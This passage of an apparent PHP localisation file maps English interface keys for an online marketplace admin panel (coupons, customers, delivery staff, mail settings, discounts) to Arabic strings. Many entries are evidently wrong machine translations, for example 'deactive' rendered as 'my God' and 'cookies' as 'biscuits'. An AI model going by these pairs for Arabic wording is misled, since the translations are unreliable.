بأمان ويتم استخدامه لإخطار الدفع)', 'click_here' => 'انقر هنا', 'click_on_continue' => 'انقر فوق متابعة', 'click_on_the' => 'اضغط على', 'click_on_the_map_to_see_your_location_latitude' => 'انقر على الخريطة لترى خط عرض موقعك', 'click_on_the_map_to_see_your_location_longitude' => 'انقر على الخريطة لرؤية خط الطول في موقعك', 'click_plus_icon' => 'انقر فوق أيقونة بالإضافة إلى', 'client' => 'عميل', 'client_ID' => 'معرف العميل', 'client_OAuth_Login' => 'العميل OAuth تسجيل الدخول', 'client_Secret' => 'سر العميل', 'client_id' => 'معرف العميل', 'client_secret' => 'سر العميل', 'close' => 'يغلق', 'close_for_now' => 'قريب الآن', 'close_now' => 'إغلاق الآن', 'closed_for_now' => 'مغلق الآن', 'closed_now' => 'مغلق الآن', 'code' => 'شفرة', 'codecanyon_username' => 'اسم المستخدم Codecanyon', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'جمع القسائم من المتاجر والتقدم للحصول على خصم خاص من المتاجر', 'collected_cash' => 'جمع النقود', 'color' => 'لون', 'color image' => 'صورة ملونة', 'color wise image' => 'صورة اللون الحكيمة', 'color_variant' => 'متغير اللون', 'colors' => 'الألوان', 'colour_wise_product_image' => 'لون المنتج الحكيمة', 'come_back_soon' => 'عود قريبا', 'comission' => 'comission', 'comment' => 'تعليق', 'commission' => 'عمولة', 'commission_Earning' => 'كسب اللجنة', 'commission_Given' => 'العمولة المعطاة', 'commission_earned' => 'كسب العمولة', 'commission_given' => 'العمولة المعطاة', 'company' => 'شركة', 'company_ID' => 'هوية الشركة', 'company_Information' => 'معلومات الشركة', 'company_Name' => 'اسم الشركة', 'company_address' => 'عنوان الشركة', 'company_copyright_text' => 'نص حقوق الطبع والنشر للشركة', 'compare' => 'يقارن', 'compare_list_Removed' => 'قارن القائمة التي تمت إزالتها', 'complaint' => 'شكوى', 'complete_Registration' => 'اكمل التسجيل', 'complete_the_add_details_form_and_press' => 'أكمل نموذج التفاصيل إضافة واضغط', 'completed' => 'مكتمل', 'completed_Orders' => 'أوامر مكتملة', 'completed_payments' => 'مدفوعات مكتملة', 'config_data_updated' => 'تكوين بيانات تحديث', 'configuration_invalid' => 'التكوين غير صالح', 'configure' => 'تهيئة', 'configure_SMTP_settings' => 'تكوين إعدادات SMTP', 'confirm_Email' => '.تأكيد عنوان البريد الإلكتروني', 'confirm_it_works_perfectly' => 'تأكيد أنه يعمل بشكل مثالي', 'confirm_password' => 'تأكيد كلمة المرور', 'confirm_your_new_password' => 'قم بتأكيد كلمة المرور الجديدة الخاصة بك', 'confirmed' => 'مؤكد', 'consumer_electronics' => 'مستهلكى الكترونيات', 'contact' => 'اتصال', 'contact info' => 'معلومات الاتصال', 'contact_Info' => 'معلومات الاتصال', 'contact_List' => 'قائمة الإتصال', 'contact_Person_Name' => 'اسم شخص الاتصال', 'contact_Us' => 'اتصل بنا', 'contact_With_Seller' => 'الاتصال مع البائع', 'contact_bold' => 'الاتصال Bold', 'contact_deleted_successfully' => 'تم حذف الاتصال بنجاح', 'contact_info' => 'معلومات الاتصال', 'contact_number' => 'رقم الاتصال', 'contact_person_name' => 'اسم شخص الاتصال', 'contact_us' => 'اتصل بنا', 'contact_with_seller' => 'الاتصال مع البائع', 'contact_with_support_team' => 'الاتصال مع فريق الدعم', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details_such_as_hostname_port_username_and_password' => 'اتصل بمزود خدمة البريد الإلكتروني الخاص بك أو مسؤول تكنولوجيا المعلومات للحصول على تفاصيل خادم SMTP مثل اسم المستخدم وكلمة المرور', 'contacts' => 'جهات الاتصال', 'continue' => 'يكمل', 'continue_shopping' => 'مواصلة التسوق', 'convert_point_to_wallet_money' => 'تحويل النقطة إلى محفظة أموال', 'convert_to_currency' => 'تحويل العملة', 'convert_your_loyalty_point_to_wallet_money.' => 'تحويل نقطة الولاء الخاصة بك إلى محفظة المال.', 'convert_your_loyalty_points_into_wallet_money' => 'تحويل نقاط الولاء الخاصة بك إلى أموال محفظة', 'converted_amount' => 'المبلغ المحول', 'converted_from_loyalty_point' => 'تم تحويلها من نقطة الولاء', 'cookie_Settings' => 'إعدادات ملفات تعريف الارتباط', 'cookie_setting' => 'إعداد ملفات تعريف الارتباط', 'cookie_settings' => 'إعدادات ملفات تعريف الارتباط', 'cookie_text' => 'نص ملفات تعريف الارتباط', 'cookies' => 'بسكويت', 'copied' => 'نسخ', 'copied_failed' => 'فشل نسخ', 'copied_to_the_clipboard' => 'نسخ إلى الحافظة', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'نسخ مفتاح الموقع ومعجون المفتاح السري في المدخلات المودعة أدناه وحفظ.', 'copy_URI' => 'Copyiri', 'copy_path' => 'مسار نسخ', 'copy_right' => 'حقوق النشر', 'copy_the_latitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'انسخ خط عرض موقع عملك من خرائط Google ولصقه هنا', 'copy_the_longitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'انسخ خط الطول من موقع عملك من خرائط Google ولصقه هنا', 'copy_your_code_and_share_your_friends' => 'انسخ الرمز الخاص بك وشارك أصدقائك', 'copyright' => 'حقوق النشر', 'cost' => 'يكلف', 'cost_per_product' => 'التكلفة لكل منتج', 'country' => 'دولة', 'country_code' => 'الرقم الدولي', 'country_code_is_must' => 'رمز البلد لا بد منه', 'country_code_is_must_like_for_BD' => 'رمز البلد يجب أن يكون مثل BD', 'country_name' => 'اسم الدولة', 'coupon' => 'قسيمة', 'coupon_Add' => 'القسيمة إضافة', 'coupon_Discount' => 'خصم القسيمة', 'coupon_Discount_Amount' => 'مبلغ خصم القسيمة', 'coupon_Edit' => 'قسيمة تحرير', 'coupon_added_successfully' => 'وأضاف القسيمة بنجاح', 'coupon_applied_successfully' => 'تم تطبيق القسيمة بنجاح', 'coupon_bearer' => 'حامل القسيمة', 'coupon_bearer_is_required' => 'حامل القسيمة مطلوب', 'coupon_bearer_is_required!' => 'حامل القسيمة مطلوب!', 'coupon_code' => 'رمز الكوبون', 'coupon_discount' => 'خصم القسيمة', 'coupon_discount_amount' => 'مبلغ خصم القسيمة', 'coupon_discount_will_be_shown_here' => 'سيتم عرض خصم القسيمة هنا', 'coupon_form' => 'نموذج القسيمة', 'coupon_is_invalid' => 'القسيمة غير صالحة', 'coupon_list' => 'قائمة القسيمة', 'coupon_setup' => 'إعداد القسيمة', 'coupon_title' => 'عنوان القسيمة', 'coupon_type' => 'نوع القسيمة', 'coupon_update' => 'تحديث القسيمة', 'coupons' => 'كوبونات', 'coupons_table' => 'جدول القسائم', 'create' => 'يخلق', 'create_App' => 'إنشاء التطبيق', 'create_a_support_tickets' => 'قم بإنشاء تذاكر الدعم', 'create_a_unique_product_code_by_clicking_on_the_âGenerate_Codeâ_button' => 'قم بإنشاء رمز منتج فريد من خلال النقر فوق الزر ء رمز', 'create_credentials' => 'إنشاء بيانات الاعتماد', 'create_support_tickets' => 'إنشاء تذاكر الدعم', 'create_your_own_business' => 'إنشاء عملك الخاص', 'create_your_own_store.' => 'قم بإنشاء متجرك الخاص.', 'created_at' => 'أنشئت في', 'credential_setup' => 'إعداد الاعتماد', 'credential_updated' => 'تحديث بيانات الاعتماد', 'credentials' => 'أوراق اعتماد', 'credentials_SetUp_page' => 'بيانات إعداد بيانات الاعتماد', 'credentials_do_not_match_or_account_has_been_suspended' => 'بيانات الاعتماد لا تتطابق أو تم تعليق الحساب', 'credit' => 'ائتمان', 'currencies' => 'العملات', 'currency' => 'عملة', 'currency_Position' => 'موقف العملة', 'currency_changed_to' => 'تغيرت العملة إلى', 'currency_code' => 'رمز العملة', 'currency_name' => 'اسم العملة', 'currency_symbol' => 'رمز العملة', 'current_Stock' => 'الأسهم الحالية', 'current_Stock_Amount' => 'مبلغ المخزون الحالي', 'current_customer' => 'العميل الحالي', 'current_stock' => 'الأسهم الحالية', 'current_stock_qty' => 'الأسهم الحالية الكمية', 'current_value_is' => 'القيمة الحالية هي', 'currently_you_are_managing_banners_for_' => 'حاليا أنت تدير لافتات', 'custom' => 'مخصص', 'custom_Date' => 'موعد مخصص', 'custom_date' => 'موعد مخصص', 'custom_role' => 'دور مخصص', 'customer' => 'عميل', 'customer Name' => 'اسم الزبون', 'customer added successfully' => 'أضاف العميل بنجاح', 'customer wallet' => 'محفظة العميل', 'customer wallet hist...' => 'محفظة العميل هيست ...', 'customer wallets' => 'محافظ العملاء', 'customer_Details' => 'تفاصيل العميل', 'customer_ID' => 'هوية الزبون', 'customer_Info' => 'معلومات العميل', 'customer_Information' => 'معلومات العميل', 'customer_List' => 'قائمة العملاء', 'customer_Loyalty_Point' => 'نقطة ولاء العملاء', 'customer_Loyalty_Point_Settings' => 'إعدادات نقطة ولاء العملاء', 'customer_Name' => 'اسم الزبون', 'customer_Referrer_Earning' => 'كسب مرجع العميل', 'customer_Referrer_Settings' => 'إعدادات إحالة العملاء', 'customer_Reviews' => 'آراء العملاء', 'customer_Wallet' => 'محفظة العميل', 'customer_Wallet_Settings' => 'إعدادات محفظة العميل', 'customer_details' => 'تفاصيل العميل', 'customer_id' => 'هوية الزبون', 'customer_info' => 'معلومات العميل', 'customer_information' => 'معلومات العميل', 'customer_list' => 'قائمة العملاء', 'customer_loyalty_point' => 'نقطة ولاء العملاء', 'customer_loyalty_point_report' => 'تقرير نقطة ولاء العملاء', 'customer_message' => 'رسالة العميل', 'customer_message_table' => 'جدول رسالة العميل', 'customer_name' => 'اسم الزبون', 'customer_not_found' => 'لم يتم العثور على العميل', 'customer_one' => 'عميل واحد', 'customer_referrer_earning' => 'كسب مرجع العميل', 'customer_removed' => 'إزالته العميل', 'customer_reviews' => 'آراء العملاء', 'customer_settings' => 'إعدادات العملاء', 'customer_settings_updated_successfully' => 'تحديث إعدادات العميل بنجاح', 'customer_two' => 'العميل اثنين', 'customer_verify' => 'يتحقق العميل', 'customer_wallet' => 'محفظة العميل', 'customer_wallet_bonus_edit' => 'تحرير مكافأة محفظة العميل', 'customer_wallet_bonus_setup' => 'إعداد مكافأة محفظة العميل', 'customer_wallet_settings' => 'إعدادات محفظة العميل', 'customer_will_get_extra_amount_to_his_or_her_wallet_additionally_with_the_amount_he_or_she_added_from_other_payment_gateways' => 'سيحصل العميل على مبلغ إضافي لمحفظته أو محفظته بالإضافة إلى المبلغ الذي أضافه من بوابات الدفع الأخرى', 'customers' => 'عملاء', 'customers_receive_a_verification_code_after_placing_an_order' => 'يتلقى العملاء رمز التحقق بعد تقديم طلب', 'customers_settings' => 'إعدادات العملاء', 'customers_will_download_the_latest_customer_app_version_using_this_URL' => 'سيقوم العملاء بتنزيل أحدث إصدار لتطبيق العميل باستخدام عنوان URL هذا', 'dark' => 'مظلم', 'dashboard' => 'لوحة القيادة', 'dashboard_order_statistics' => 'إحصائيات طلب لوحة القيادة', 'data' => 'بيانات', 'database' => 'قاعدة البيانات', 'date' => 'تاريخ', 'date_Submitted' => 'تاريخ التقديم', 'date_type' => 'نوع التاريخ', 'day' => 'يوم', 'day_limit' => 'حد اليوم', 'days' => 'أيام', 'days_after_delivery' => 'أيام بعد التسليم', 'days_free_delivery' => 'أيام التوصيل المجاني', 'deactive' => 'إلهي', 'deactive all seller product' => 'تعطيل جميع منتجات البائع', 'deactive all seller!!' => 'إلهي جميع البائع !!', 'deal of the days' => 'صفقة من الأيام', 'deal_Of_The_Day' => 'صفقة اليوم', 'deal_Product' => 'صفقة المنتج', 'deal_form' => 'نموذج الصفقة', 'deal_of_the_day' => 'صفقة اليوم', 'debit' => 'دَين', 'decimal_point_settings' => 'إعدادات النقطة العشرية', 'default' => 'تقصير', 'default currency can not be deleted!' => 'لا يمكن حذف العملة الافتراضية!', 'default currency can not be deleted!to delete change the default currency first!' => 'لا يمكن حذف العملة الافتراضية! لحذف تغيير العملة الافتراضية أولاً!', 'default language can not be deleted! to delete change the default language first!' => 'لا يمكن حذف اللغة الافتراضية! لحذف تغيير اللغة الافتراضية أولا!', 'default language can not be deleted!to delete change the default language first!' => 'لا يمكن حذف اللغة الافتراضية! لحذف تغيير اللغة الافتراضية أولاً!', 'default_Method_updated_failed' => 'فشل تحديث الطريقة الافتراضية', 'default_Method_updated_successfully' => 'تم تحديث الطريقة الافتراضية بنجاح', 'default_commission' => 'اللجنة الافتراضية', 'default_commission (%)' => 'اللجنة الافتراضية (٪)', 'default_language_can_not_be_deactive' => 'لا يمكن إلغاء تعطيل اللغة الافتراضية', 'default_language_can_not_be_deleted' => 'لا يمكن حذف اللغة الافتراضية', 'default_method' => 'الطريقة الافتراضية', 'default_sort' => 'الفرز الافتراضي', 'default_status' => 'الحالة الافتراضية', 'delete' => 'يمسح', 'delete it' => 'احذفه', 'delete_account' => 'حذف الحساب', 'delete_it' => 'احذفه', 'delete_profile' => 'حذف الملف الشخصي', 'deleted!' => 'تم الحذف!', 'delivered' => 'تم التوصيل', 'delivered_By' => 'سلمت بواسطة', 'delivered_by' => 'سلمت بواسطة', 'delivery' => 'توصيل', 'delivery histories' => 'تاريخ التسليم', 'delivery man transac...' => 'تسليم رجل Transac ...', 'delivery men' => 'رجال التوصيل', 'delivery zip codes' => 'الرموز البريدية للتسليم', 'delivery-Man' => 'رجل التوصيل', 'delivery-man' => 'رجل التوصيل', 'delivery_Charge' => 'رسوم التوصيل', 'delivery_Man' => 'رجل التوصيل', 'delivery_Man_Settings' => 'إعدادات رجل التسليم', 'delivery_Restriction' => 'تقييد التسليم', 'delivery_address' => 'عنوان التسليم', 'delivery_available_country' => 'التسليم متاح البلد', 'delivery_available_zip_code_area' => 'تسليم منطقة الرمز البريدي المتاحة', 'delivery_charge' => 'رسوم التوصيل', 'delivery_charge_earned' => 'رسوم التوصيل المكتسبة', 'delivery_country_added_successfully' => 'أضاف بلد التسليم بنجاح', 'delivery_country_deleted_successfully' => 'تم حذف بلد التسليم بنجاح', 'delivery_country_restriction_status_changed_successfully' => 'تغيرت حالة تقييد بلد التسليم بنجاح', 'delivery_fee' => 'رسوم التوصيل', 'delivery_fee_discount' => 'خصم رسوم التسليم', 'delivery_info' => 'معلومات التسليم', 'delivery_information_details' => 'تفاصيل معلومات التسليم', 'delivery_man' => 'رجل التوصيل', 'delivery_man_app_version_control' => 'التحكم في إصدار تطبيق تطبيق MAN MAN', 'delivery_man_info' => 'معلومات رجل التسليم', 'delivery_man_management' => 'إدارة رجل التسليم', 'delivery_man_name' => 'تسليم اسم رجل', 'delivery_man_phone' => 'هاتف التوصيل', 'delivery_man_successfully_assigned/changed' => 'تم تعيين/تغيير رجل التسليم بنجاح', 'delivery_man_successfully_assigned_or_changed' => 'تم تعيين أو تغيير رجل التسليم بنجاح', 'delivery_restriction' => 'تقييد التسليم', 'delivery_service_name' => 'اسم خدمة التوصيل', 'delivery_to_country' => 'التسليم إلى البلد', 'delivery_to_zip_code_area' => 'التسليم إلى منطقة الرمز البريدي', 'delivery_type' => 'نوع التوصيل', 'delivery_zip_code_deleted_successfully' => 'تم حذف الرمز البريدي للتسليم بنجاح', 'delivery_zip_code_restriction_status_changed_successfully' => 'تم تغيير حالة تقييد الرمز البريدي للتسليم بنجاح', 'deliveryman' => 'رجل التوصيل', 'deliveryman notifica...' => 'إعلام التسليم ...', 'deliveryman wallets' => 'محافظ التوصيل', 'deliveryman_List' => 'قائمة التوصيل', 'deliveryman_can_not_assign_or_change_in_that_status' => 'لا يمكن للتسليم تعيين أو تغيير في هذه الحالة', 'deliveryman_charge_add_successfully' => 'تهمة التوصيل بنجاح', 'deliveryman_email' => 'البريد الإلكتروني للتسليم', 'deliveryman_image' => 'صورة تسليم', 'deliveryman_info' => 'معلومات التسليم', 'deliveryman_man_can_not_assign/change_in_that_status' => 'لا يمكن لـ Deliveryman Man تعيين/تغيير في هذه الحالة', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'لا يمكن لـ Deliveryman Man تعيين أو تغيير في هذه الحالة', 'deliveryman_name' => 'اسم التسليم', 'deliveryman_phone' => 'هاتف التسليم', 'deliveryman_review' => 'مراجعة التوصيل', 'deliveryman_will_get' => 'سيحصل التسليم', 'deliverymen_will_download_the_latest_deliveryman_app_version_using_this_URL' => 'سيقوم رجال التسليم بتنزيل أحدث إصدار تطبيق Deliveryman باستخدام عنوان URL هذا', 'deneid' => 'واد', 'deneied' => 'deneied', 'denied' => 'رفض', 'denied_Products' => 'تم رفض المنتجات', 'denied_note' => 'نكرت ملاحظة', 'deny' => 'ينكر', 'describe_your_issue' => 'وصف مشكلتك', 'description' => 'وصف', 'details' => 'تفاصيل', 'details_Description' => 'وصف التفاصيل', 'dev' => 'ديف', 'dhaka' => 'دكا', 'digit_after_decimal_point' => 'رقم بعد نقطة عشرية', 'digital' => 'رقمي', 'digital product' => 'المنتج الرقمي', 'digital_Payments' => 'المدفوعات الرقمية', 'digital_file_ready' => 'ملف رقمي جاهز', 'digital_payment' => 'الدفع الرقمي', 'digital_payments' => 'المدفوعات الرقمية', 'digital_product_type' => 'نوع المنتج الرقمي', 'digitally paid' => 'دفع رقميا', 'digitally_paid' => 'دفع رقميا', 'digitaly_paid' => 'مدفوعة الرقمية', 'direction' => 'اتجاه', 'disabled' => 'عاجز', 'disabling_SMTP_mail_configuration_services_stops_email_sending' => 'تعطيل خدمات تكوين البريد SMTP يوقف إرسال البريد الإلكتروني', 'disabling_sendgrid_mail_configuration_services_stops_email_sending' => 'تعطيل خدمات تكوين بريد SendGrid يوقف إرسال البريد الإلكتروني', 'disburse' => 'صرف', 'discount' => 'تخفيض', 'discount on purchase' => 'خصم على الشراء', 'discount_Amount' => 'مقدار الخصم', 'discount_Given' => 'خصم', 'discount_Type' => 'نوع الخصم', 'discount_amount' => 'مقدار الخصم', 'discount_amount_is_required' => 'مبلغ الخصم مطلوب', 'discount_amount_is_required!' => 'مبلغ الخصم مطلوب!', 'discount_bearer' => 'حامل الخصم', 'discount_given' => 'خصم', 'discount_on_Purchase' => 'خصم على الشراء', 'discount_on_product' => 'خصم على المنتج', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'سيتم عرض خصم على الشراء وشراء مبلغ القسيمة الأول هنا', 'discount_type' => 'نوع الخصم', 'discount_type_is_required' => 'نوع الخصم مطلوب', 'discount_type_is_required!' => 'نوع الخصم مطلوب!', 'discounted' => 'مخفضة', 'discounted_Amount' => 'مبلغ مخفض', 'discounted_amount' => 'مبلغ مخفض', 'discounted_products' => 'منتجات مخفضة', 'display_name' => 'اسم العرض', 'do_not_have_the_template' => 'ليس لديك القالب', 'do_you_want_to_change_in_addon_status' => 'هل تريد التغيير في حالة الملحق', 'do_you_want_to_delete_this' => 'هل تريد حذف هذا', 'do_you_want_to_logout' => 'هل ترغب بالخروج', 'do_you_want_to_shift_in_another_theme' => 'هل تريد التحول في موضوع آخر', 'domain' => 'اِختِصاص', 'donât_miss_todays_deal' => 'لا تفوت صفقة اليوم', 'download' => 'تحميل', 'download_PDF' => 'تحميل PDF', 'download_URL_For_Customer_App' => 'تنزيل عنوان URL لتطبيق العميل', 'download_URL_For_Deliveryman_App' => 'قم بتنزيل URL للتسليم', 'download_URL_For_Seller_App' => 'تنزيل URL لتطبيق البائع', 'download_here' => 'حمل هنا', 'download_link' => 'رابط التحميل', 'download_our_app' => 'قم بتنزيل تطبيقنا', 'download_the_file_in_device_named' => 'قم بتنزيل الملف في الجهاز المسمى', 'download_the_format_file_and_fill_it_with_proper_data.' => 'قم بتنزيل ملف التنسيق واملأه بالبيانات المناسبة.', 'drag_&_drop_file_or_browse_file' => 'ملف السحب وإسقاط الملف أو تصفح الملف', 'driver' => 'سائق', 'driving' => 'القيادة', 'driving_License' => 'رخصة قيادة', 'drop_here' => 'انزل هنا', 'due_Amount' => 'مبلغ مستحق', 'duration' => 'مدة', 'eBook' => 'الكتاب الاليكتروني', 'earn_From_Order' => 'كسب من الطلب', 'earn_From_Shipping' => 'كسب من الشحن', 'earn_money _o_your_wallet_by_completing_the_offer_&_challenged' => 'كسب المال يا محفظتك من خلال إكمال العرض والتحدي', 'earned_by_referral' => 'كسبها الإحالة', 'earning' => 'كسب', 'earning_From_Shipping' => 'كسب من الشحن', 'earning_Reports' => 'كسب التقارير', 'earning_Statistics' => 'كسب الإحصاءات', 'earning_statistics' => 'كسب الإحصاءات', 'earning_statistics_for_business_analytics' => 'كسب إحصائيات لتحليلات الأعمال', 'earnings' => 'الأرباح', 'earnings_to_Each_Referral' => 'الأرباح لكل إحالة', 'ebooks' => 'الكتب الإلكترونية', 'ecommerce' => 'التجارة الإلكترونية', 'edit' => 'يحرر', 'edit_Customer' => 'تحرير العميل', 'edit_Offline_Payment_Method' => 'تحرير طريقة الدفع في وضع عدم الاتصال بالإنترنت', 'edit_address' => 'تعديل العنوان', 'edit_most_demanded' => 'تحرير معظم المطلب', 'edit_products' => 'تحرير المنتجات', 'edit_profile' => 'تعديل الملف الشخصي', 'edit_shop' => 'تحرير متجر', 'electronics' => 'الإلكترونيات', 'email' => 'بريد إلكتروني', 'email_ID' => 'عنوان الايميل', 'email_Verification' => 'تأكيد بواسطة البريد الالكتروني', 'email_address' => 'عنوان البريد الإلكتروني', 'email_already_has_been_taken' => 'تم التقاط البريد الإلكتروني بالفعل', 'email_configuration_error' => 'خطأ تكوين البريد الإلكتروني', 'email_configured_perfectly' => 'تم تكوين البريد الإلكتروني تمامًا', 'email_failed' => 'فشل البريد الإلكتروني', 'email_id' => 'عنوان الايميل', 'email_not_found' => 'البريد الإلكتروني غير موجود', 'email_status_is_not_active' => 'حالة البريد الإلكتروني غير نشطة', 'email_templates' => 'قوالب البريد الإلكتروني', 'email_verification' => 'تأكيد بواسطة البريد الالكتروني', 'emergency contacts' => 'جهة اتصال للطوارئ', 'emergency_Contact' => 'الاتصال بالطوارىء', 'emergency_contact' => 'الاتصال بالطوارىء', 'employee_Login_Page' => 'صفحة تسجيل الدخول الموظف', 'employee_Role_Setup' => 'إعداد دور الموظف', 'employee_add' => 'إضافة الموظف', 'employee_form' => 'نموذج الموظف', 'employee_image' => 'صورة الموظف', 'employee_list' => 'قائمة موظف', 'employee_login_url' => 'url تسجيل الدخول إلى الموظف', 'employee_role' => 'دور الموظف', 'employee_section' => 'قسم الموظف', 'employee_table' => 'جدول الموظف', 'employees' => 'موظفين', 'empty' => 'فارغ', 'empty_Cart' => 'عربة فارغة', 'empty_cart' => 'عربة فارغة', 'enable_POS_in_Seller_Panel' => 'تمكين نقاط البيع في لوحة البائع', 'enable_mail_configuration' => 'تمكين تكوين البريد', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'سيسمح تمكين خدمات تكوين البريد للنظام بإرسال البريد الإلكتروني.', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'سيسمح تمكين خدمات تكوين البريد للنظام بإرسال البريد الإلكتروني.', 'encryption' => 'التشفير', 'end' => 'نهاية', 'end Date' => 'تاريخ الانتهاء', 'end_Date' => 'تاريخ الانتهاء', 'end_date' => 'تاريخ الانتهاء', 'enjoy_new_experience' => 'استمتع بتجربة جديدة', 'enter_Attribute_Name' => 'أدخل اسم السمة', 'enter_Social_Media_Link' => 'أدخل رابط وسائل التواصل الاجتماعي', 'enter_captcha_value' => 'أدخل قيمة Captcha', 'enter_choice_values' => 'أدخل قيم الاختيار', 'enter_email' => 'أدخل البريد الإلكتروني', 'enter_email_address' => 'أدخل عنوان البريد الالكتروني', 'enter_email_address_or_phone_number' => 'أدخل عنوان البريد الإلكتروني أو رقم الهاتف', 'enter_email_or_phone_number' => 'أدخل البريد الإلكتروني أو رقم الهاتف', 'enter_mailer_name' => 'أدخل اسم البريد', 'enter_name' => 'أدخل الاسم', 'enter_new_email_address' => 'أدخل عنوان بريد إلكتروني جديد', 'enter_new_password' => 'أدخل كلمة مرور جديدة', 'enter_password' => 'أدخل كلمة المرور', 'enter_phone_number' => 'أدخل رقم الهاتف', 'enter_tag' => 'أدخل العلامة', 'enter_the_driver_for_your_mailing_service' => 'أدخل السائق لخدمتك البريدية', 'enter_the_encryption_type' => 'أدخل نوع التشفير', 'enter_the_name_of_the_host_of_your_mailing_service' => 'أدخل اسم مضيف الخدمة البريدية الخاصة بك', 'enter_the_obtained_SMTP_server_details _including_the_hostname _port _username _and password' => 'أدخل تفاصيل خادم SMTP التي تم الحصول عليها بما في ذلك اسم المستخدم وكلمة مرور اسم Port', 'enter_the_port_number_for_your_mailing_service' => 'أدخل رقم المنفذ لخدمتك البريدية', 'enter_the_username_of_your_account' => 'أدخل اسم المستخدم لحسابك', 'enter_url' => 'إدخال عنوان الموقع', 'enter_your_email' => 'أدخل بريدك الإلكتروني', 'enter_your_email_ID' => 'أدخل معرف البريد الإلكتروني الخاص بك', 'enter_your_email_address' => 'أدخل عنوان بريدك الالكتروني', 'enter_your_order_ID_& _phone_to_get_delivery_updates' => 'أدخل معرف الطلب والهاتف للحصول على تحديثات التسليم', 'enter_your_password' => 'ادخل رقمك السري', 'enter_zip_code' => 'أدخل الرمز البريدي', 'enters_point_amount' => 'يدخل مبلغ النقطة', 'environment' => 'بيئة', 'environment_Information' => 'معلومات البيئة', 'environment_setup' => 'إعداد البيئة', 'equivalent_Point_to_1_Unit_Currency' => 'نقطة مكافئة لعملة وحدة واحدة', 'erfe' => 'إرفي', 'error' => 'خطأ', 'estimated_Delivary_Date' => 'تاريخ تسريح المقدر', 'estimated_delivery_date' => 'التاريخ المتوقع للوصول', 'everything_will_be_rearranged' => 'سيتم إعادة ترتيب كل شيء', 'ex' => 'السابق', 'ex = ' => 'السابق =>', 'ex = 123456' => 'على سبيل المثال=> 123456', 'ex = Alex' => 'على سبيل المثال=> أليكس', 'ex = ex@yahoo.com' => 'على سبيل المثال=> ex@yahoo.com', 'ex = tls' => 'على سبيل المثال=> TLS', 'ex = yahoo' => 'على سبيل المثال=> ياهو', 'ex= ' => 'السابق=>', 'ex= 0.00' => 'على سبيل المثال=> 0.00', 'ex= 2.1' => 'على سبيل المثال=> 2.1', 'ex= 49679646444789dsf64f64f6' => 'على سبيل المثال=> 49679646444789DSF64F64F6', 'ex= 5' => 'على سبيل المثال=> 5', 'ex= 587' => 'على سبيل المثال=> 587', 'ex= 70' => 'على سبيل المثال=> 70', 'ex= dhaka' => 'على سبيل المثال=> دكا', 'ex= f64f6' => 'على سبيل المثال=> F64F6', 'ex= mail.google.one' => 'على سبيل المثال=> mail.google.one', 'ex= salam' => 'على سبيل المثال=> سلام', 'ex_= _7+_character' => 'على سبيل المثال=> 7+ حرف', 'ex_= _8+_character' => 'على سبيل المثال=> 8+ حرف', 'example@example.com' => 'Example@example.com', 'excel' => 'Excel', 'excellent' => 'ممتاز', 'exchange_rate' => 'سعر الصرف', 'exclude' => 'استبعاد', 'exclude_with_product' => 'باستثناء المنتج', 'expand_Menu' => 'توسيع القائمة', 'expand_cart' => 'توسيع العربة', 'expected_delivery_date' => 'تاريخ التسليم المتوقع', 'expense_Amount' => 'مبلغ المصاريف', 'expense_Statistics' => 'إحصاءات المصاريف', 'expense_Transaction_Statement' => 'بيان المعاملة النفقات', 'expense_Transactions' => 'معاملات المصاريف', 'expense_Type' => 'نوع المصاريف', 'expense_amount' => 'مبلغ المصاريف', 'expense_transaction' => 'صفقة المصاريف', 'expense_type' => 'نوع المصاريف', 'expire date' => 'تاريخ انتهاء الصلاحية', 'expire_date' => 'تاريخ انتهاء الصلاحية', 'expired' => 'منتهي الصلاحية', 'expires_on' => 'تنتهي صلاحيته في', 'explore_now' => 'استكشف الآن', 'export' => 'يصدّر', 'extra' => 'إضافي', 'extra_Discount' => 'خصم اضافي', 'extra_discount' => 'خصم اضافي', 'extra_discount_added_successfully' => 'تم إضافة خصم إضافي بنجاح', 'extra_on_discount' => 'إضافي على الخصم', 'facebook' => 'فيسبوك', 'facebook_API_Set_up_Instructions' => 'Facebook API إعداد التعليمات', 'facebook_Login' => 'تسجيل الدخول الى الفيسبوك', 'failed' => 'فشل', 'failed To Deliver' => 'فشل في التسليم', 'failed to delivery' => 'فشل التسليم', 'failed!Sorry_we_can`t_complete_your_order' => 'فشل! آسف لا يمكننا إكمال طلبك', 'failed!_Sorry_we_can`t_complete_your_order' => 'فشل! آسف لا يمكننا إكمال طلبك', 'failed-to-deliver' => 'فشل للتخلص', 'failedSorry_we_can`t_complete_your_order' => 'فاشلة لا يمكننا إكمال طلبك', 'failed_!_Sorry_we_can`t_complete_your_order' => 'فشل ! آسف لا يمكننا إكمال طلبك', 'failed_To_Delivery' => 'فشل التسليم', 'failed_to_Deliver' => 'فشل في التسليم', 'failed_to_add_deliveryman_charge' => 'فشل في إضافة رسوم التوصيل', 'failed_to_deliver' => 'فشل في التسليم', 'failed_to_delivery' => 'فشل التسليم', 'false' => 'خطأ شنيع', 'faq' => 'التعليمات', 'fast_delivery_all_accross_the_country' => 'تسليم سريع كل ما يتراكم في البلاد', 'faster_&_secure_way_to_pay_bill' => 'طريقة أسرع وآمنة لدفع الفاتورة', 'fawry_pay' => 'Fawry pay', 'feature deals' => 'ميزة الصفقات', 'feature_deal' => 'ميزة الصفقة', 'featured' => 'متميز', 'featured deal' => 'صفقة مميزة', 'featured_Deal' => 'صفقة مميزة', 'featured_Product_From_This_Store' => 'منتج مميز من هذا المتجر', 'featured_Products' => 'منتجات مميزة', 'featured_deal' => 'صفقة مميزة', 'featured_product' => 'المنتج المميز', 'featured_product_for_this_season' => 'منتج مميز لهذا الموسم', 'featured_product_from_this_store' => 'منتج مميز من هذا المتجر', 'featured_products' => 'منتجات مميزة', 